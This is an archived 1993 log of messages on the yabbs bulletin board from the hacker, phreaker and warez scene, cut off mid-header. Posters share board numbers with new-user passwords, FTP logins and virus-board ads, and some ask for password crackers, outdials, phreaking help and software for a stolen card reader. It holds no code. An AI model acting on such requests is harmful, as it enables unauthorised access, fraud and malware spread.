May 10 00:35:23 1993 From: proteus@yabbs To: holden@yabbs Subject: re: scene in pitt Date: Mon May 10 00:35:23 1993 okay...well, vitroth was offering anonymous acct's earlier this year (which meant you could go thru an annex dialup) but he stopped for some reason or other... ---proteus From rdx@yabbs Mon May 10 18:58:36 1993 From: rdx@yabbs To: all@yabbs Subject: Date: Mon May 10 18:58:36 1993 Can anyone tell me about hout to use when i connect it just hang there till the connection is timed out? From vitroth@yabbs Mon May 10 23:18:03 1993 From: vitroth@yabbs To: proteus@yabbs Subject: re: scene in pitt Date: Mon May 10 23:18:03 1993 In message re: scene in pitt, proteus said: > okay...well, vitroth was offering anonymous acct's earlier this year > (which meant you could go thru an annex dialup) but he stopped for some > reason or other... > > ---proteus when I get back from vacation this fall I plan to again offer accounts... I will however require some sort of verifiable name/way to contact you. these however will NOT be given out, unless you are caught doing something illegal. the reasoning behind this lies in why I shut down this semester. hacking... both into the system and out of... first off, hacking into a free system is stupid!! where's the point?? second hacking from a sight where the sysadmin is being kind enough to give you free access is ALSO dumb... So, to repeat... I will again be offering accounts in the fall. I will require some sort of ID. I will allow users to do whatever they want on the system (within reason) as long as it doesn't get ME, CMU, or the user in trouble, or have the POTENTIAL to do so... Also in the fall I will most likely be running a copy of yabbs on the machine. but we'll see about that... Also note that I am running basically a beta OS (linux)... thus problems seem to be frequent... hopefully the tcpip bugs will be fixed by the fall. I'll be leaving for home in two days, and probably won't stop by here before then... My email for the summer will be (forwarded to my home town)... Enjoy the summer... see you in the fall. -Vit... � From ziplock@yabbs Tue May 11 10:56:54 1993 From: ziplock@yabbs To: zyklon-b@yabbs Subject: re: Forum-BBS Date: Tue May 11 10:56:54 1993 In message Forum-BBS, zyklon-b said: > I haven't seen any of the Forum-clone BBS software at any sites... > However, do call [BoSS] at 1.304.697.6131 and mention ZyKLoN-b (and that I > mailed you on YABBS) and you'll get access -- there's a really good > selection of BBS softwares available... you can look around in /pub/BBS-software on ( I can't remember if I have forum hacks in there or not. Haven't looked in a while. If you have stuff that I'm missing, dump it in /incoming.� From pegasus@yabbs Tue May 11 12:49:00 1993 From: pegasus@yabbs To: all@yabbs Subject: FSP Date: Tue May 11 12:49:00 1993 Hi! Just want you to know that someone (a guy from germany) has posted the fsplist.041993 to the newsgroup alt.comp.fsp In the article the address to severeal warez sites were included, so I don't think you can expect these sites to live for to long. Pegasus From holden@yabbs Tue May 11 19:10:12 1993 From: holden@yabbs To: vitroth@yabbs Subject: re: scene in pitt Date: Tue May 11 19:10:12 1993 I don't need to spunge any account. Finally got a generic email address.. Umm.. People were hacking INTO your system? They triying to get shell or something? What about cmu getting pissed off? I mean, you pay a good $25k/year to go to the fucking school. They provide you with ethernet connections, true, but you should be allowed to do what ever you want. Do they impose any shit like say "we can shut your access whenever we want,"etc Starting fall I'll be paying 25k/year at cmu as a frosh and I better be allowed to set my ibm up with linux and run a chat system for all my friends. � From nivek@yabbs Wed May 12 10:13:52 1993 From: nivek@yabbs To: all@yabbs Subject: Crakers an d scanners Date: Wed May 12 10:13:52 1993 Hi! I need a cracker for the macintosh chooser extenstion, that will find username and password...also interested in scanner progs...where can I find some (good sites, etc) THis isn't for anything illegal:) I just want the warez Peace, love and anarchy, Nivek From comrade@yabbs Sun Aug 15 01:01:10 1993 From: comrade@yabbs To: all@yabbs Subject: AWA Date: Sun Aug 15 01:01:10 1993 Join Us Join Us Join Us AWA - Anti Warez Association We kick Ass Find out for yourself.... ftp - /pub/Zines/AWA Start from issue three and read back to two and one. Youll enjoy it more that way... Warez suck man. We need your feedback we need your submissions. Jason Farnon From fatdog@yabbs Wed Aug 18 08:18:49 1993 From: fatdog@yabbs To: greywolf@yabbs Subject: re: OUTDIALS, FSP Date: Wed Aug 18 08:18:49 1993 >Anybody have some outdials for europe, or GODs? And anybody >else got some fsp sites? good ones that is. > >GREY WOLF mail some my way if u can... much appreciated, FaTDoG.. From galaxie@yabbs Wed Aug 18 11:38:52 1993 From: galaxie@yabbs To: all@yabbs Subject: fsp sites.. Date: Wed Aug 18 11:38:52 1993 After a long summer, all the fsp sits inthe world go sour (go figure) Anyone out there have any sort of listing for this weeks fsp sites. I can not offer to trade any with you right now, but will be able to probably in the future once I get my feet back in the net. Email � From neuroph@yabbs Wed Aug 18 17:23:43 1993 From: neuroph@yabbs To: comrade@yabbs Subject: re: AWA Date: Wed Aug 18 17:23:43 1993 Fuck you man. The AWA sucks shit. (note to all vengeful warez.lovers, someone from the same site as this pleb posted that huge Warez site list to, even tho half of it was bullshit, they still must die!) Death to you. From gaunt@yabbs Thu Aug 19 03:55:58 1993 From: gaunt@yabbs To: all@yabbs Subject: Relays Date: Thu Aug 19 03:55:58 1993 Does anyone know of a site that offers telnet or ftp relay facilities? I know about a couple of terminal servers you can bounce off of, and I'm willing to trade these for some new sites. You can catch me at if you want to take it to email. Gaunt. � From comrade@yabbs Thu Aug 19 16:44:19 1993 From: comrade@yabbs To: octal@yabbs Subject: re: AWA Date: Thu Aug 19 16:44:19 1993 Thanks for the AWA support. Write something man.... You know where to reach us. From iceman@yabbs Thu Aug 19 18:48:12 1993 From: iceman@yabbs To: pegasus@yabbs Subject: re: FSP Date: Thu Aug 19 18:48:12 1993 Re: Posting of FSP warez sites Good, I hope they all die, along with the meatheads who use them. iceman From nerve@yabbs Thu Aug 19 23:15:29 1993 From: nerve@yabbs To: all@yabbs Subject: ... Date: Thu Aug 19 23:15:29 1993 Call Ionic Destruction at 215/722-0570, NUP=ROOM 246. Mention that you got the number from here and you will get immediate access. Best HPA board in PA, no warez, text based. Good users.. nuf said... Optik Nerve From maestro@yabbs Sat Aug 21 19:10:53 1993 From: maestro@yabbs To: all@yabbs Subject: 604 Date: Sat Aug 21 19:10:53 1993 The 604 Scene is pretty wild now, its in British Columbia BC, Theres quite a few good BBS's out there, worth checking out.... The Sanitarium BBS! 604-272-5980 Great Discussion, and Great Files.. To the sysop here, how would i go about uploading onto here, i can upload alot my groups text files 'Sighkadelickz EMAG' we're only interested in hacking, and electronics projects and stuff so we've had no complaints so far.... See ya! ~ ThE MaEsTrO ~ From htoaster@yabbs Sun Aug 22 00:26:01 1993 From: htoaster@yabbs To: maestro@yabbs Subject: re: 604 Date: Sun Aug 22 00:26:01 1993 In message 604, maestro said: > To the sysop here, how would i go about uploading onto here, i can upload > alot my groups text files 'Sighkadelickz EMAG' we're only interested in > hacking, and electronics projects and stuff so we've had no complaints so > far.... ftp to this machine, log in as ftp, and dump it in /incoming. alex � From noc@yabbs Sun Aug 22 04:25:16 1993 From: noc@yabbs To: all@yabbs Subject: sanctuary. Date: Sun Aug 22 04:25:16 1993 When will scantuary be back up??? From valgamon@yabbs Sun Aug 22 17:14:40 1993 From: valgamon@yabbs To: all@yabbs Subject: PGP Date: Sun Aug 22 17:14:40 1993 I need some serious help using PGP. it seems to be the big craze lately, but I don't have a clue how to use it. can anyone help? � From valgamon@yabbs Sun Aug 22 17:16:35 1993 From: valgamon@yabbs To: all@yabbs Subject: new H/P/A ftp site Date: Sun Aug 22 17:16:35 1993 login: UFi pw: UFi_ftp dir: /ufi/ please contribute, we're just starting out. -Lord Valgamon � From griton@yabbs Mon Aug 23 00:10:34 1993 From: griton@yabbs To: all@yabbs Subject: C00l h/p , music pc board! Date: Mon Aug 23 00:10:34 1993 Call to... Scream! BBS +54.[0]1.72.6305 24-8 east time. h/p, Pc Music, Cracks, VGA Stuff, friends.... To C00l Axes: name: INTER pw: NET Your sysop... El Griton From griton@yabbs Mon Aug 23 00:12:55 1993 From: griton@yabbs To: all@yabbs Subject: Member Wanted! Date: Mon Aug 23 00:12:55 1993 A new h/p international group is boring.... WANTED MEMBERS... we need: .Pc/Amiga .14.4 .x25,bbox,inet axes .girl (or boy) if u think you are in the rulez... mail me... El Griton From griton@yabbs Mon Aug 23 00:15:05 1993 From: griton@yabbs To: htoaster@yabbs Subject: Yo! sysop. Date: Mon Aug 23 00:15:05 1993 nice bbs :) congratulations.. :) if u need anything... say me (a ni, axes, any...:) bye. El Griton From karlm@yabbs Thu Aug 26 12:45:03 1993 From: karlm@yabbs To: valgamon@yabbs Subject: re: new H/P/A ftp site Date: Thu Aug 26 12:45:03 1993 Please post or email me the right password UFi_ftp doesn't work. KarlM From comrade@yabbs Thu Aug 26 13:03:41 1993 From: comrade@yabbs To: maestro@yabbs Subject: re: 604 Date: Thu Aug 26 13:03:41 1993 617-599-7154 textfiles data only From thedev@yabbs Thu Aug 26 13:51:09 1993 From: thedev@yabbs To: hankster@yabbs Subject: re: 703 dialout Date: Thu Aug 26 13:51:09 1993 You can't telnet to VaTech? try telneting to ( It's a 7-bit connection, but you can connect to all on campus bbs's and all the tech hosts through vttelnet. TheDev From iceman@yabbs Sun Aug 29 13:18:08 1993 From: iceman@yabbs To: all@yabbs Subject: Add Date: Sun Aug 29 13:18:08 1993 ][-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-][ Silicon Valley Home of Freedom 2o4.669.7983 Northern Phun Co cDc Global Domination 1 N0de, 24oo 0nLY! Dist. Site Factury Direct Outlet 2 3l33t for U! S00per 3l33t UUCP Mail (, Running 0n a 486DX2-66 und3r D0S! (we're t00 c00l to multitask). N0 k0dez, war3z, ansi. **** Thousands of the m0st ult1mat3-sp1ffy-krad3st Tf1l3s ar0und! **** Freedom,Phrack,cDc,PHUN,LoD, Cud,NSA,ATI,NIA,ANE,Chaos,uXu,AOTD,Chalisti, CERT,CIAC,DDN,LOL,40HEX,Informatik, NFX,FBI,NuKE,Phantasy,Worldview,NARC, PPP, Telecom Archives,EFF, DFP,Legal Papers, CPI, Vindicator Productions, Virii,Source C0de,Scanners,Hackers,Cell Fraud,AWA,UN*X Security/Crackers, Anarkey,ArcV,Trident, Phalcon/Skism, Summercon GIFs,RL,RDT,Syndicate,UPI, Encryption,PGP,Networking, Radio Modifications,Virus S0urce,USEnet,Email. The latest news in the hp and telecom community! For questions, mail ][-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-]-[-o-][ From griton@yabbs Sun Aug 29 14:46:09 1993 From: griton@yabbs To: iceman@yabbs Subject: Yo. Date: Sun Aug 29 14:46:09 1993 Yo.. mna! are u a sysop of thisboard? ehhhh? see ya i the board? call to scream.. see last msg.. El Griton/WL w3/s From iceman@yabbs Mon Aug 30 07:56:26 1993 From: iceman@yabbs To: griton@yabbs Subject: re: Yo. Date: Mon Aug 30 07:56:26 1993 Yes i'm the sysop, if you like, call and apply. No prob. iceman From comrade@yabbs Mon Aug 30 11:43:43 1993 From: comrade@yabbs To: iceman@yabbs Subject: re: Add Date: Mon Aug 30 11:43:43 1993 AWA. Your board is bound to kick ass :) From greywolf@yabbs Tue Aug 31 02:18:39 1993 From: greywolf@yabbs To: all@yabbs Subject: HELP! Date: Tue Aug 31 02:18:39 1993 I need help bad!! Over the summer I lost my access and when I came back.. Al of my contacts/sites are GONE!! I'm in dire need of any hack info (code wise especially) that's out there that you can spare.. especially ODs (preferabbly GODs), hack bbs (like this one) and (ya, I lamed a bit) Warez sites.. This is QUITE important as this is the ONLY hack related site on the Net that I'm on.. and.. well..that makes me feel a little.. grimmy :) So anyone who posts/mails me here I will be IMMENSLEY gratified!! Thank you!! GreyWolf! From presiden@yabbs Tue Aug 31 14:31:06 1993 From: presiden@yabbs To: all@yabbs Subject: Looking for portnumbers Date: Tue Aug 31 14:31:06 1993 Hello, I have discovered a bug in a local system, so I'm now able to telnet, the only restriction is that i must tlenet to a site with a portnumber. So has anybody some numbers for me?? Thanks in advance, you won't regret it! Cya! The President. P.S. Yes, indeed, I'm back! From Lucifer@yabbs Sun Sep 5 04:26:04 1993 From: Lucifer@yabbs To: pez@yabbs Subject: re: scanners Date: Sun Sep 5 04:26:04 1993 Have you tried the scanner in Terminate 1.0 (assuming you have a PC)??? It looks pretty good, a bit of a bitch to get into as it acts like the movie Wargames and waits for you to enter your name as joshua... From VI@yabbs Sun Sep 5 04:32:32 1993 From: VI@yabbs To: comrade@yabbs Subject: re: AWA Date: Sun Sep 5 04:32:32 1993 GEEK!!! Don't you have anything better to do with your life than write up an entire magazine about how much you can't stand "warez?" I mean, if you don't like the kids who are cracking warez and distributing them, then why don't you just NOT PARTICIPATE? And you _SUPPORT_ someone who supports the SPA and net-police? Someone should kick your fucking teeth in and throw your nark, rat, squeeler friend into a barrel of 98% sulfuric acid. There is NEVER anything cool about a squeeler who turns in people who aren't hurting anyone. And for the record, I'm not a courier, cracker, pirate BBS sysop, or anything like that. But, I sure as hell appreciate the fact that they distribute useful programs. Aside from the people who destroy property, all people on the net and "cyberspace" should stick together. You wanna be "anti-warez?" Go apply to the SPA for a job. Or are you not over 18 yet? Loser. VI From VI@yabbs Sun Sep 5 04:45:58 1993 From: VI@yabbs To: all@yabbs Subject: HP BBS Date: Sun Sep 5 04:45:58 1993 Tardis BBS 305.559.9059 H/P/V/A The latest versions of H/P utils Hundreds of H/P .txt files 300+ virii Active message bases NUP: SYSTEMX Tell the sysop that Cyber sent you if you expect to see more than a fed would have access to. From Artimage@yabbs Tue Sep 7 21:39:45 1993 From: Artimage@yabbs To: greywolf@yabbs Subject: re: HP BBS Date: Tue Sep 7 21:39:45 1993 Ok Grey Wolf, has an underground section. It is ok, kinda for newbies, but that can change. Meet me here or there and we'll talk. P.s. I used to be Lord Cyber on this system. Artimage.- From iceman@yabbs Wed Sep 8 15:40:26 1993 From: iceman@yabbs To: comrade@yabbs Subject: re: Add Date: Wed Sep 8 15:40:26 1993 you bet. Now Phalcon/Skism Canada! iceman From illumina@yabbs Sat Sep 11 22:22:57 1993 From: illumina@yabbs To: all@yabbs Subject: Date: Sat Sep 11 22:22:57 1993 call: The Virus Outlet AE 215-775-7195 free virii over 700 online use login: AE / pass: VIRUS / last 4#s: 0000 call and leech all you want! From comrade@yabbs Sun Sep 12 11:26:56 1993 From: comrade@yabbs To: all@yabbs Subject: re: AWA Date: Sun Sep 12 11:26:56 1993 You're a looser. I didn't post it, Coup did. But I wish I did. I applaud coup for doing so. jas0n "AWA Will Rock Your World" Farnon From comrade@yabbs Sun Sep 12 11:27:31 1993 From: comrade@yabbs To: octal@yabbs Subject: re: AWA Date: Sun Sep 12 11:27:31 1993 Thank you for AWA Support. Jason "I'm not against Piracy I'm against Warez" farnon From comrade@yabbs Sun Sep 12 11:28:24 1993 From: comrade@yabbs To: all@yabbs Subject: re: ... Date: Sun Sep 12 11:28:24 1993 K-Call 617-599-7154 N0W And chat me. or download all my tfiles its a decent board. i just erased 50 inactive users should be room for you From comrade@yabbs Sun Sep 12 11:31:24 1993 From: comrade@yabbs To: all@yabbs Subject: re: AWA Date: Sun Sep 12 11:31:24 1993 VI you're lame. I tried to reply to you, but you don't exist on this board anymore. You're lame. I'm not supporting that "net p0lice". Warez d00dz do hurt you idiot. They take up valuable time and massive amounts of space for their 0 day bullshit. Are you over 18 looser? jas0n From comrade@yabbs Sun Sep 12 11:31:56 1993 From: comrade@yabbs To: artimage@yabbs Subject: re: HP BBS Date: Sun Sep 12 11:31:56 1993 Grey Wolf? The same Grey Wolf from Hack Volumes who posted all the C0deZ and #s? Nice to see he is still around jas0n From octal@yabbs Sun Sep 12 17:11:30 1993 From: octal@yabbs To: comrade@yabbs Subject: warez and the INet Date: Sun Sep 12 17:11:30 1993 I agree with the "no warez on the net" policy. Nobody wants valuable bandwidth being wasted on that crap. Warez should be forced back to the dialup bbs's or trading stuff in the back room of a friends house. Fortunately, all of the truly good, useful programs are available on the net and free(GNU is a great example of this). The only game that I have on my system at home is Rogue(unix version), and it's freeware. As for pirates who would disagree, I would say this:If you can't find what you want where you live, or on a local board, you just aren't looking hard enough. I live in a small, hick town, and I could get just about anything that I desired if I looked hard enough. Octal From nphire@yabbs Tue Sep 14 18:41:20 1993 From: nphire@yabbs To: artimage@yabbs Subject: re: HP BBS Date: Tue Sep 14 18:41:20 1993 Hey artimage good to see ya on here! Anybody know of any H/P/especially V boardZ in 701? From nphire@yabbs Tue Sep 14 18:43:56 1993 From: nphire@yabbs To: illumina@yabbs Subject: re: Date: Tue Sep 14 18:43:56 1993 Called the AE, it was down. Probs? HEy, I got a /<-RAD place for you to get virii. Mail me. It's not LD. From admiral@yabbs Tue Sep 14 21:06:11 1993 From: admiral@yabbs To: comrade@yabbs Subject: re: AWA Date: Tue Sep 14 21:06:11 1993 Yea, I agree with you on the groups and shit man. Not only that but if you want to have their warez on your board you have to pay the group something like $200 a year. That's what I heard about Razor at least. That's a bunch of bullshit. IMO that's not what warez are if you have to pay for them. llatta From ratpack@yabbs Thu Sep 16 13:12:21 1993 From: ratpack@yabbs To: all@yabbs Subject: ... Date: Thu Sep 16 13:12:21 1993 _ _ ((___)) [ o o ] \ / (O O) U cDc Global Domination Factory Direct Outlet 3000+ textfiles/newsletters Usenet Newsgroups & Internet Email (514) 683-1894 new user password: DUNE notice: only the experienced need to apply From hbeast@yabbs Thu Sep 16 18:53:11 1993 From: hbeast@yabbs To: all@yabbs Subject: oldies Date: Thu Sep 16 18:53:11 1993 Damn, I hate replying to old messages like this, but still... About BBS software: check out wuarchives, under the MSDOS directory. They have everything, but stuff gets deleted and added all the time. also was great and had lots of "rare" BBS programs, but I just logged off there and it's down because of a HD crash. As for wares on, the thing that really killed me was when someone posted an .NFO file made by USA/Fairlight... and that group died when I still traded wares, and that's been a loong time. Hmm, actually, the part that killed me was when some people replied to the effect of, "Gee, looks like we're really getting those pirates!!1!!! Maybe someone should notify the SPA about all this!!!1!" herd beasT From xenon@yabbs Thu Sep 16 21:11:22 1993 From: xenon@yabbs To: hbeast@yabbs Subject: re: oldies Date: Thu Sep 16 21:11:22 1993 USA/Fairlight! Ah, yes. It's good to hear those names admist all the screaming by the new IBM warez d00dz about how you need a 486 or yer shit on the screen...speaking of 64 era, I've heard of and even at one time had some addresses for 64 ftp suites. Demos are my main concern. Believe it or not, I have a 64 sitting right next to me running at this moment! Wow! Can you say 1mhz? Ah, well, if anyone has some addresses, I'd ppreciate immensly. Maybe I'll write 'em down somewhere this time...heh. Ya know, I remember a time when your computer didn't matter. A time when users helped eachother out regardless of what piece of shit you had plugged into the wall. A time when...ah, fuck the sermen, point of matter: computer users gotta stick togeather especially in this day and age. Who cares if you have a 486DX/2 running at 66mhz? It's what you do with it that counts! --> Xenon Please send all donations to the Church of the Holy 8-bit. From phragger@yabbs Sat Sep 18 06:47:43 1993 From: phragger@yabbs To: ratpack@yabbs Subject: re: ... Date: Sat Sep 18 06:47:43 1993 You wouldn't mind posting the ip-address for as well, yes ? From ratpack@yabbs Sun Sep 19 21:27:56 1993 From: ratpack@yabbs To: phragger@yabbs Subject: re: ... Date: Sun Sep 19 21:27:56 1993 It's not connected to the Internet. It's a MS-DOS based bbs. is my netmail address to a gateway fido-style network for newsgroups and netmails. Later From jon@yabbs Mon Sep 20 14:54:32 1993 From: jon@yabbs To: all@yabbs Subject: Life & Death Date: Mon Sep 20 14:54:32 1993 Does anyone know a good Ftp site that has either Life& Death 1 or 2 ? Any reply would be grateful From ydancer@yabbs Mon Sep 20 16:36:04 1993 From: ydancer@yabbs To: all@yabbs Subject: Mag strip reader Date: Mon Sep 20 16:36:04 1993 A friend of mine ripped off a magnetic strip reader from work and gave it to me to screw around with. Anyway, if anyone here knows anything about magnetic strip readers, or has some kind of software to operate the things, I'd appreciate any help. Here's some technical stuff about the thing... The thing's made by a company called Magtek. It consists of two parts. the first part is the magnetic strip reader itself. It's connected via a phone cord to a keypad and 1 line LCD display. The strip reader also has 2 sets of 8-pin jumpers (16 total) and a serial output, which makes me think that the terminal/keypad part isn't really necessary (since I could send all the input to it via the serial connection anyway. Anyway, any help would be greatly appreciated (I sure as hell don't want to resort to hooking the thing up and trying to communicate with it through my terminal software...) From liqjesus@yabbs Mon Sep 20 17:07:09 1993 From: liqjesus@yabbs To: xenon@yabbs Subject: re: oldies Date: Mon Sep 20 17:07:09 1993 Hmmm...I was around during the "glory days" of the old C64 and groups like ESI and PE were the kings of warez. I seem to remember just as many attitudes back then as there are today. This 0 day warez crap is no new phenomenon! Yes, I'll even admit that I was once a Warez D00d! Now I barely find enough time to hit the bars, let alone download all the newest games (which I never played, but used to upload to other boards)! -Liquid Jesus- From htoaster@yabbs Mon Sep 20 18:19:31 1993 From: htoaster@yabbs To: jon@yabbs Subject: re: Life & Death Date: Mon Sep 20 18:19:31 1993 please don't talk about warez here...if people start giving out sites i'm going to have to put more restrictions on the board. right now we are one of the few boards that I know of that doesn't require any user info to get an account, and i would like to keep it that way. htoaster From lobster@yabbs Mon Sep 20 21:32:16 1993 From: lobster@yabbs To: ydancer@yabbs Subject: re: Mag strip reader Date: Mon Sep 20 21:32:16 1993 ------------------------- to me to screw around with. Anyway, if anyone here knows anything about magnetic strip readers, or has some kind of software to operate the things, I'd appreciate any help. Here's some technical stuff about the -------------------------- Check Informatik Magazine #2 (INFORM-2.ZIP/ARJ/etc). Count Zero typed up a great article on magnetic strip readers which can be found in that mag. /*-- Lobster --*/ From moth@yabbs Tue Sep 21 13:17:14 1993 From: moth@yabbs To: all@yabbs Subject: Phreaking in South Africa. Date: Tue Sep 21 13:17:14 1993 Hi there people! I need information on phreaking. I'm familiar with the basic principles of blue-boxing etc. Has anybody managed anything on the South African phone net, or do you know of someone who can help. Has anybody tried ??? The country code is +27 xx xxx xxxx. Any files or docs would be welcome. Cheers moth From xenon@yabbs Tue Sep 21 18:34:25 1993 From: xenon@yabbs To: liqjesus@yabbs Subject: re: oldies Date: Tue Sep 21 18:34:25 1993 Sure, there's always been attitutes as far back as I can remember. I learned to BS up a storm when I first got my modem just to connect to some 0-0-0-0 BBS. What I am saying is that way-back-when, if you had a computer and wanted to learn, people were a lot friendlier. Remember "trainees?" But not only that, it didn't matter much if you were hacking on a 64, ][c, or a TI. There was a lot more bonding of the underground regardless of computer type. --> Xenon From xenon@yabbs Tue Sep 21 22:50:20 1993 From: xenon@yabbs To: all@yabbs Subject: re: Mag strip reader Date: Tue Sep 21 22:50:20 1993 I've always wanted to get my hands on one of those things and look it over. Wasn't there an article in 2600 last year about them? If anyone knows of a supplier for the kind you see in gas stations, restraunts, etc. where the reader and keypad are all in one unit, pleaze pass the info. along. --> Xenon (too busy "studying" to do anything else...) From comrade@yabbs Wed Sep 22 16:34:04 1993 From: comrade@yabbs To: octal@yabbs Subject: re: warez and the INet Date: Wed Sep 22 16:34:04 1993 I'm against the warez scene in general, and hate bandwith wasted on it. Most of the shit can be found locally anyways. GNU is a god-send. I just might volunteer there next year. Software should be free. I should be able to have the windows 4.0 source. "Take a bottle drink it down, pass it aroung, why that crazy marry" ja jason From comrade@yabbs Wed Sep 22 16:36:43 1993 From: comrade@yabbs To: ratpack@yabbs Subject: re: ... Date: Wed Sep 22 16:36:43 1993 I am on underworld, well at least I hope my account still exists. Its a nice quiet board, I recommend it for everyone. BUT ratpack I am pissed at you. May Dem0nseed FESTER on your rotting body. Because Global Domination Factory Outlets are not permitted to put cows in ANY of thier advertisments... You should know that! jason From comrade@yabbs Wed Sep 22 16:38:25 1993 From: comrade@yabbs To: htoaster@yabbs Subject: re: Life & Death Date: Wed Sep 22 16:38:25 1993 This place is pretty free. We were talking about warez sucking, but warez d00dz mistook it for a k-rad FTP xchange!@# This place is cool. I wouldn't want to compromize it. 617-599-7154 From xenon@yabbs Sun Sep 26 23:32:29 1993 From: xenon@yabbs To: liqjesus@yabbs Subject: re: good old days Date: Sun Sep 26 23:32:29 1993 Yes, YES, YES! I hate calling a board with a huge 50 page application asking stupid things like whats ES stand for? Like any asswipe couldn't read 2600 or Phrack and find out everything in a single issue. I just have one question...WHY? (er, that's ESS...) I mean, its not like a fed's not gonna know what a 5ESS or an X-Bar is. If they don't, then what are they doing bustin' BBSs? I've pratically...well, I have given up calling new board 'cuz they're basically a waste of time. I mean, I'm sure there are some good ones out there, but the sheer quantity of these other 3l33t boards sorta ruin the x-periance. Actually, I've never really thought of myself as an elite d00d because my main driving force is information itself. And not only gathering knowledge, but spreading whatever small tibits of info I have to others who ask. I guess that sorta goes against the grain of being totally elite. And that's probably why I miss the "old" days like I do. Sure, *maybe* I've done carding, VMB hacking, and other activities that one would call elite, but if I did partake in such activities, it was during my prepubecent years and definately nothing to brag about. As for the bare inner workings, that's what keeps me going. Not for exploitation, but just for the knowledge. And what would I do with that knowledge if not make free long distance calls? Well, willingly confide in others *if they ask*. I'm not talking about trading, but the FREE exchage of information. THAT's what I miss. It's sad that people have to be so tight-lipped these days. I'm not trying to place the blame on anyone here. It's just society reacting to the explosive emergence to this new and wonderful technology. I don't hate codrez and crackers and phreakers etc. Just think if they all stopped warring and pooled the immense knowledge togeather...and no, I'm not some raving flower-child either. Just a bored college student sitting on top of the fucin' world and high on technology. I hope I never do, but will probably become some bored yuppie in a million $ house lined with plastic explosives to keep people away from my precious information. Oh, man, am I getting depressed here ;). --> Xenon (stumples off his soapbox and wonders what the hell he just said...if this makes sense to you, PLEASE explain it to me!) ...and thank you for your support...*puke* From admiral@yabbs Tue Sep 28 17:43:59 1993 From: admiral@yabbs To: liqjesus@yabbs Subject: re: good old days Date: Tue Sep 28 17:43:59 1993 Well, actually, there's another reason for those tests. Ever have someone call your board and just leech leech leech. It's rather annoying. And then you get this message that says why can't I download when thye max their ratio out. I'm not interested in whether or not they have the latest warez. In fact, I don't even care if they pirate or not. I run a h/p/a board and they have to know what the fuck they are talking about. I had a user come on who didn't know what the fuck LOD stands for. That kind I just automatically delete. llatta From admiral@yabbs Tue Sep 28 17:45:57 1993 From: admiral@yabbs To: xenon@yabbs Subject: re: good old days Date: Tue Sep 28 17:45:57 1993 I agree wholeheartedly with you on the part about t about pulling knowledge together. I don't agree on the newuser questionnaires. I think there has to be some questions to weed out lame ass people who don't have any business calling there. But, it shouldn't be that long as to take more than 5 minutes. llatta From maestro@yabbs Tue Sep 28 23:41:34 1993 From: maestro@yabbs To: all@yabbs Subject: NEW BBS Date: Tue Sep 28 23:41:34 1993 The Dynerium BBS 604-856-3933 H/P Areas With Lots Of Box Files, And Unix Stuff... Reaslly New, CXheck it Out.... ~ ThE MaEsTrO ~ /s From xenon@yabbs Tue Sep 28 23:41:34 1993 From: xenon@yabbs To: admiral@yabbs Subject: re: good old days Date: Tue Sep 28 23:41:34 1993 Yeah, but how's anyone gonna learn shit? As long as there are modems, yer gonna have some lame-ass moron knockin on yer door thinking he's gods gift to the hackers. My philosaphy is let him blurt sum stupid out and then feel the wrath of the other users. I mean, hes the one who's gonna be getting 10 large pizzas a night. If, on the other hand, they really want to learn and have the smallest bit of common sense to keep their mouth shut, whats the problem with them d/ling a text phile or watch people talk about things that they wouldnt understand anywayz. Ok, no learning can beat "on-the-job" training. To really understand stuph, ya gotta x-perince it! With the way things are, though, you cant just sit at home and try shit out anymore. Why condem an possible future ally to the brig before he even had a chance to start? Im not saying walking someone thru things step-by-step, im sayin let the little leech d/l a few g-files, do sum reading, and keep their mouth shut 'till they have a clue. The way I am, if someone has a question for me, ill help em out (within the limits of my patience) as much as i can. Probably 'cuz the people around when i first got my modem were the same way even though i wuz a little bad-ass. Im not sayin do that, though. Ya cant help everyone along and ya cant be Mr. "Right There to hold yer hand" either. What im sayin is, whats the problem in letting someone on even if they dont know a few lines of an encryption scheme in c, (got asked that a little while ago). If they fuck around, its their funeral...personally, id be more weary of a user that answered all the questions concisely than someone who just phucked around...least i know they have a sense of humor. --> Xenon (Damn, I typed all that? How time flies when yer...well...) From phragger@yabbs Wed Sep 29 01:59:28 1993 From: phragger@yabbs To: admiral@yabbs Subject: re: good old days Date: Wed Sep 29 01:59:28 1993 I can't say I really agree with you there. Some questionnare is problably quite necessary, rather I think that "participation" , etc.. Should allow the user further access. 1. that questionnare shit, starts moving towards that place, where social status is above intelligence and 2. some people are sometimes new to this shit, and d they just might be in in it to learn. From liqjesus@yabbs Wed Sep 29 18:02:38 1993 From: liqjesus@yabbs To: admiral@yabbs Subject: leeches Date: Wed Sep 29 18:02:38 1993 I agree that new user tests do help to weed out leeches, lamers, and locals (the dreaded three). My complaint is when the sysop expects you to study a technical manual before you can log on to his board! I often wonder if such sysops can answer half the questions themselves! ps. And that whole controversy over whether sysops should let locals on their boards is pretty dumb. Half the time it's the locals who do the uploading/downloading. Most ld folks get free ratios! -LJ- From lordcybr@yabbs Thu Sep 30 00:32:46 1993 From: lordcybr@yabbs To: all@yabbs Subject: re: leeches Date: Thu Sep 30 00:32:46 1993 I am about to open up a bbs, I wonder what I should do. Do I have ratios at all, or do it by points? Should I have a questonair? I don't know what I should do, so I am asking what do you think would make the best bbs? Artimage.- From Rage@yabbs Thu Sep 30 01:29:46 1993 From: Rage@yabbs To: htoaster@yabbs Subject: yabbs on Unix Date: Thu Sep 30 01:29:46 1993 I have tried to compile Yabbs on Sun OS 4.1.3, And having problems, Is there a Update to it, That will allow it to operate on SunOS? From xenon@yabbs Fri Oct 1 10:42:03 1993 From: xenon@yabbs To: lordcybr@yabbs Subject: re: leeches Date: Fri Oct 1 10:42:03 1993 Personally, I think the best BBSs are free access BBSs. My own ill-fated board, Freeport, (ill-fated due to 2 HD deaths in a space of a couple o months), was like that. Free exchange of information and all that jazz. Because it was a one-liner, had to put time restrictions on users and calls/day, but that's it. Otherwise, to get in, all you needed was a handle and a password and a few minutes to space thru all my new user ramblings. --> Xenon From Groove@yabbs Fri Oct 1 14:05:46 1993 From: Groove@yabbs To: all@yabbs Subject: thanks. Date: Fri Oct 1 14:05:46 1993 Thank you all for confirming the fact to me that the scene was not dead. I was heavilly into the scene several years ago but got out for various reasons. Now that I have been in college for a few years and am meeting people with similar interests, I am getting back into it with caree and knowledge than I used to have. Thanks to all of you. From tyrant@yabbs Sat 